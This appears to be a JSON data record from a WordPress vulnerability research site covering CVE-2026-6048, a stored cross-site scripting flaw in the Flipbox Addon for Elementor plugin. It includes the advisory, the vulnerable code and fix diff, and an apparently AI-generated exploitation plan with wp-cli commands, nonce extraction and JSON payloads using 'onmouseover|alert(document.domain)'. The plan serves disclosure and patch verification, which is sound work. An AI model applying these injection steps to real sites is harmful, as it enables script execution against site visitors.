[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fehyQUlES7YqmJ34qCrAh4_MYaSWpR10dvyRPl6OlLjg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-6048","flipbox-addon-for-elementor-authenticated-author-stored-cross-site-scripting-via-custom-attributes","Flipbox Addon for Elementor \u003C= 2.1.1 - Authenticated (Author+) Stored Cross-Site Scripting via Custom Attributes","The Flipbox Addon for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Flipbox widget's button URL `custom_attributes` field in all versions up to, and including, 2.1.1 due to insufficient validation of custom attribute names. Specifically, the plugin uses `esc_html()` on the attribute name which does not prevent event handler attributes (e.g., `onmouseover`, `onclick`). This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","ultimate-flipbox-addon-for-elementor",null,"\u003C=2.0.8","2.1.2","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-17 14:40:16","2026-04-18 03:37:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffaa6ad51-7b3b-4fe1-95fa-e9b63943d533?source=api-prod",1,[22,23,24,25,26,27],"readme.txt","ultimate-flipbox-addon-for-elementor.php","widget\u002Fsimple\u002Fufae-frontend\u002Fclass-ufae-frontend-item.php","widget\u002Fsimple\u002Fufae-frontend\u002Fclass-ufae-frontend-output.php","widget\u002Fstories\u002Fufae-frontend\u002Fclass-ufae-frontend-loop.php","widget\u002Fstories\u002Fufae-frontend\u002Fclass-ufae-frontend-output.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-6048\n\n## 1. Vulnerability Summary\nThe **Flipbox Addon for Elementor** plugin (up to version 2.1.1) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the way custom attributes for flipbox buttons are rendered on the frontend. Specifically, the plugin uses `esc_html()` to sanitize the **attribute name** (key) of custom attributes provided in the Elementor widget settings. While `esc_html()` prevents breaking out of HTML tags, it does not prevent the use of valid HTML event handlers like `onmouseover`, `onclick`, or `onerror`. An attacker with Author-level permissions can inject arbitrary JavaScript by providing an event handler as the attribute name.\n\n## 2. Attack Vector Analysis\n* **Widget Types:** `Basic Flipbox` (Simple), `Story Flipbox` (Stories), or `Post Flipbox`.\n* **Vulnerable Parameter:** The `custom_attributes` field within the `button_link` control settings.\n* **Endpoint:** WordPress Post Editor (Elementor) or direct `wp-json\u002Fwp\u002Fv2\u002Fposts` or `admin-ajax.php` (elementor_ajax).\n* **Required Role:** Author or higher (any role capable of editing posts and using Elementor).\n* **Payload Format:** `attribute_name|attribute_value` (e.g., `onmouseover|alert(1)`).\n\n## 3. Code Flow\nThe trace follows the rendering of the \"Simple\" flipbox widget:\n1. **Entry:** `UFAE\\Widget\\Simple\\Ufae_Frontend\\Ufae_Frontend_Output::render()` is called when the widget is displayed.\n2. **Item Generation:** `render()` calls `$this->loop_obj->flipbox_items()`, which instantiates `UFAE\\Widget\\Simple\\Ufae_Frontend\\Ufae_Frontend_Item`.\n3. **Side Rendering:** `flipbox_items()` calls `render_sides_content( 'front', '' )` and `render_sides_content( 'back', '' )`.\n4. **Element Rendering:** `render_sides_content()` iterates through elements (icon, title, desc, button) and calls `$this->render_button( $side )`.\n5. **Sink:** Inside `render_button()` (inferred based on patch description), the plugin retrieves the settings for the button link:\n * The setting `ufae_simple_' . $side . '_button_link` contains a `custom_attributes` string.\n * The plugin parses this string (likely using `explode('|', ...)`) and renders it.\n * **Vulnerable Code Path:** `echo ' ' . esc_html( $attr_name ) . '=\"' . esc_attr( $attr_value ) . '\"';`\n * Since `esc_html('onmouseover')` remains `onmouseover`, an attacker can inject an event handler.\n\n## 4. Nonce Acquisition Strategy\nWhile an Author can use the Elementor UI directly, an automated exploit via the `admin-ajax.php` endpoint requires a nonce for the `elementor_ajax` action.\n\n1. **Action:** `elementor_ajax`\n2. **Strategy:** \n * Navigate to the Elementor editor for a specific post: `\u002Fwp-admin\u002Fpost.php?post=POST_ID&action=elementor`.\n * Use `browser_eval` to extract the nonce from the Elementor configuration object.\n * **JavaScript Variable:** `window.elementorCommonConfig.ajax.nonce`\n3. **Alternative:** Since this is a Stored XSS requiring Author privileges, the simplest method for a PoC is to use `wp post meta update` to inject the payload directly into the `_elementor_data` field, bypassing the need for an AJAX nonce during setup.\n\n## 5. Exploitation Strategy\nThe goal is to inject a flipbox widget into a post where the button has a malicious `onmouseover` attribute.\n\n### Step 1: Authentication\nLogin to the WordPress instance as an **Author** user.\n\n### Step 2: Create a Target Post\nCreate a new post that will host the Flipbox widget.\n```bash\nwp post create --post_type=post --post_status=publish --post_title=\"XSS Test Page\" --post_author=AUTHOR_ID\n```\n\n### Step 3: Inject Malicious Elementor Data\nThe `_elementor_data` meta field stores the widget configuration as a JSON string. We will inject a `ufae-flipbox` widget.\n\n**Payload JSON structure (`payload.json`):**\n```json\n[\n {\n \"id\": \"exploit_id\",\n \"elType\": \"widget\",\n \"settings\": {\n \"ufae_simple_front_button_enable\": \"yes\",\n \"ufae_simple_front_button_text\": \"Click Me\",\n \"ufae_simple_front_button_link\": {\n \"url\": \"https:\u002F\u002Fgoogle.com\",\n \"is_external\": \"\",\n \"nofollow\": \"\",\n \"custom_attributes\": \"onmouseover|alert(document.domain)\"\n }\n },\n \"widgetType\": \"ufae-simple-flipbox\"\n }\n]\n```\n\nApply the payload:\n```bash\nwp post meta update [POST_ID] _elementor_data --format=json \u003C payload.json\nwp post meta update [POST_ID] _elementor_edit_mode \"builder\"\n```\n\n### Step 4: Trigger the XSS\n1. Use `browser_navigate` to visit the post's permalink.\n2. The flipbox will render. \n3. Hovering over the front side of the flipbox (where the button is rendered) will trigger the `onmouseover` event.\n\n## 6. Test Data Setup\n* **Plugin:** Flipbox Addon for Elementor \u003C= 2.1.1.\n* **Dependencies:** Elementor plugin must be active.\n* **User:** A user with the `Author` role.\n* **Content:** A single post (ID: `[POST_ID]`) configured to use the Elementor builder.\n\n## 7. Expected Results\n* The HTML source of the rendered page should contain: `\u003Ca ... onmouseover=\"alert(document.domain)\" ...>`.\n* When a browser user hovers over the button in the Flipbox, a JavaScript alert showing the document domain should appear.\n\n## 8. Verification Steps\n1. **Database Check:**\n ```bash\n wp post meta get [POST_ID] _elementor_data\n ```\n Confirm the `custom_attributes` contains `onmouseover|alert(document.domain)`.\n2. **HTML Verification:**\n Use the `http_request` tool to fetch the post content and grep for the payload:\n ```bash\n # (Pseudocode)\n response = http_request(\"GET\", post_url)\n if \"onmouseover=\\\"alert(document.domain)\\\"\" in response.body:\n print(\"Vulnerability Confirmed\")\n ```\n\n## 9. Alternative Approaches\nIf the `ufae-simple-flipbox` widget type does not render the button as expected, try the \"Story Flipbox\" widget:\n* **Widget Type:** `ufae-stories-flipbox`\n* **Repeater Key:** `ufae_lists` (this is a repeater control).\n* **Settings Path:** Within an item in `ufae_lists`, set `ufae_front_button_link` with `custom_attributes` set to `onclick|console.log(window.origin)`.\n\n**Example Story JSON snippet:**\n```json\n{\n \"widgetType\": \"ufae-stories-flipbox\",\n \"settings\": {\n \"ufae_lists\": [\n {\n \"ufae_front_button_enable\": \"yes\",\n \"ufae_front_button_link\": {\n \"custom_attributes\": \"onmouseover|alert(1)\"\n }\n }\n ]\n }\n}\n```","The Flipbox Addon for Elementor plugin is vulnerable to authenticated stored Cross-Site Scripting (XSS) due to insufficient sanitization of custom attribute names in the Flipbox widget's button. An attacker with Author-level permissions can use event handlers like 'onmouseover' as attribute keys, allowing them to execute arbitrary JavaScript when a user interacts with the flipbox on the frontend.","\u002F\u002F widget\u002Fsimple\u002Fufae-frontend\u002Fclass-ufae-frontend-item.php lines 260-264\n$custom_attr = isset( $btn_url_setting['custom_attributes'] ) && ! empty( $btn_url_setting['custom_attributes'] ) ? explode( '|', $btn_url_setting['custom_attributes'] ) : array();\n\n$custom_attr = count( $custom_attr ) > 1 ? esc_html( $custom_attr[0] ) . '=\"' . esc_attr( $custom_attr[1] ) . '\"' : '';\n\n\u002F\u002F phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- all content sanitized using escaping function before using.\necho '\u003Ca href=\"' . esc_url( $btn_url ) . '\" class=\"ufae-button\" target=\"' . esc_attr( $blank_attr ) . '\" rel=\"' . esc_attr( $nofollow_attr ) . '\" ' . trim( $custom_attr ) . '>' . esc_html( $btn_text ) . '\u003C\u002Fa>';","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-flipbox-addon-for-elementor\u002F2.1.1\u002Fwidget\u002Fsimple\u002Fufae-frontend\u002Fclass-ufae-frontend-item.php\t2026-02-14 20:18:16.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-flipbox-addon-for-elementor\u002F2.1.2\u002Fwidget\u002Fsimple\u002Fufae-frontend\u002Fclass-ufae-frontend-item.php\t2026-04-13 18:43:52.000000000 +0000\n@@ -249,15 +249,11 @@\n \t\t\t\t$btn_url = isset($btn_url_setting['url']) && ! empty($btn_url_setting['url']) ? $btn_url_setting['url'] : false;\n \n \t\t\t\techo '\u003Cdiv class=\"ufae-btn-wrapper\">';\n-\t\t\t\tif ( $btn_url ) {\n-\t\t\t\t\t$blank_attr = isset( $btn_url_setting['is_external'] ) && 'on' === $btn_url_setting['is_external'] ? '_blank' : '_self';\n-\t\t\t\t\t$nofollow_attr = isset( $btn_url_setting['nofollow'] ) && 'on' === $btn_url_setting['nofollow'] ? 'nofollow' : '';\n-\t\t\t\t\t$custom_attr = isset( $btn_url_setting['custom_attributes'] ) && ! empty( $btn_url_setting['custom_attributes'] ) ? explode( '|', $btn_url_setting['custom_attributes'] ) : array();\n-\n-\t\t\t\t\t$custom_attr = count( $custom_attr ) > 1 ? esc_html( $custom_attr[0] ) . '=\"' . esc_attr( $custom_attr[1] ) . '\"' : '';\n-\t\t\t\t\t\n-\t\t\t\t\t\u002F\u002F phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- all content sanitized using escaping function before using.\n-\t\t\t\t\techo '\u003Ca href=\"' . esc_url( $btn_url ) . '\" class=\"ufae-button\" target=\"' . esc_attr( $blank_attr ) . '\" rel=\"' . esc_attr( $nofollow_attr ) . '\" ' . trim( $custom_attr ) . '>' . esc_html( $btn_text ) . '\u003C\u002Fa>';\n+\t\t\t\tif ($btn_url) {\n+\t\t\t\t\t$this->parent_obj->add_link_attributes('ufae_button_link', $btn_url_setting);\n+\t\t\t\t\t\u002F\u002F phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- no need escaping all attributes sanitized before using.\n+\t\t\t\t\techo '\u003Ca class=\"ufae-button\" ' . $this->parent_obj->get_render_attribute_string('ufae_button_link') . '>' . esc_html($btn_text) . '\u003C\u002Fa>';\n \t\t\t\t} else {\n \t\t\t\t\techo '\u003Cbutton class=\"ufae-button\">' . esc_html( $btn_text ) . '\u003C\u002Fbutton>';\n \t\t\t\t}","The exploit requires an attacker with Author-level privileges or higher to access the Elementor page builder. \n1. Login to WordPress as an Author.\n2. Create or edit a post using Elementor.\n3. Add a 'Basic Flipbox' (ufae-simple-flipbox) or 'Story Flipbox' widget to the page.\n4. Locate the Button settings for either the front or back side of the flipbox.\n5. In the URL control, find the 'Custom Attributes' field (standard Elementor link feature).\n6. Enter a payload using an HTML event handler as the key and a script as the value, separated by a pipe character, e.g., 'onmouseover|alert(document.domain)'.\n7. Save the page and view it as a site visitor. \n8. Hovering over the flipbox button will trigger the JavaScript payload because the plugin used esc_html() on the attribute key, which allowed the 'onmouseover' event handler to be rendered literally into the \u003Ca> tag.","gemini-3-flash-preview","2026-04-20 13:20:00","2026-04-20 13:20:33",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","2.1.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-flipbox-addon-for-elementor\u002Ftags\u002F2.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fultimate-flipbox-addon-for-elementor.2.1.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-flipbox-addon-for-elementor\u002Ftags\u002F2.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fultimate-flipbox-addon-for-elementor.2.1.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-flipbox-addon-for-elementor\u002Ftags"]